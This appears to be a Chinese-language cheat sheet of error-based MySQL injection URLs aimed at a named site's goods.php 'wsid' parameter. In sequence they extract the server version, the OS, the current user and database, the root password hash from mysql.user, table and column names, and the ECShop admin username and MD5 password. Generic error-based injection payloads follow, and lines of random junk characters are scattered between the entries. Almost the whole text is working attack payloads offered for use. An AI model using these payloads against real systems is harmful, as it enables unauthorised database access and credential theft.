判断版本号
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
- |/ b/ P0 ~! L/ O$ C
判断系统
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
' M# E7 O. H" I! w- u- g2 Y: r3 G6 ]; j+ D- b. \; b7 ^
当前 user()
9 G; N. Z8 q; _& }5 W* A! k N v
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
8 U& t3 U1 S7 U: U+ V
4 g3 e, I! |1 w X2 j$ o7 v
; Q8 z5 ?+ b8 y5 V
当前 database()
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
( `6 N' m0 c8 N- o# X7 Q2 r x2 k* b9 f" t, J1 L/ `
; u( s0 n% l/ s3 E9 S! a
. d3 E; [3 V7 C; E9 w A8 S* J) v/ [" o. M: ~5 P
root hash
, F. _( |7 d' d" x0 K7 y$ y$ K, s& g4 u# H" F
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
8 M' o( }& K2 a2 @$ w5 a/ X
/ v) @3 X! j/ z) t$ e. K0 t8 M6 A' R' o8 R4 G2 k6 g0 F: q
4 V- `4 J9 |9 q9 b: Q
当前 数据库表名
( r/ o$ f$ y+ `* E3 x0 ^) g" p7 Z# z) L$ q8 W2 M, u9 Q- `: `
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
( P6 R+ i& l& f0 A8 }8 F( [5 \: e) B4 o o8 m
当前 数据库 user_name 字段
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
$ ?: Z7 {3 a* P! c1 h6 I+ d7 b6 ]7 r6 d0 F
当前 数据库 字段 password
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
' A9 b+ G+ e& a& {
7 i) K* m& T* O1 J8 l
+ s3 _: M2 G; V8 X4 q* \# V: _
获得 admin passwd(md5)
2 I. y3 C' K9 A# V
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
0 I1 U* g, m2 }1 X J
报错注射
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
2 I5 {5 j$ O @" w/ z# R* |. v" A% s( A" W1 B& b6 f
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
, w, N5 r9 r. Y+ r6 y Q; i' S* I- H, C1 q
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) |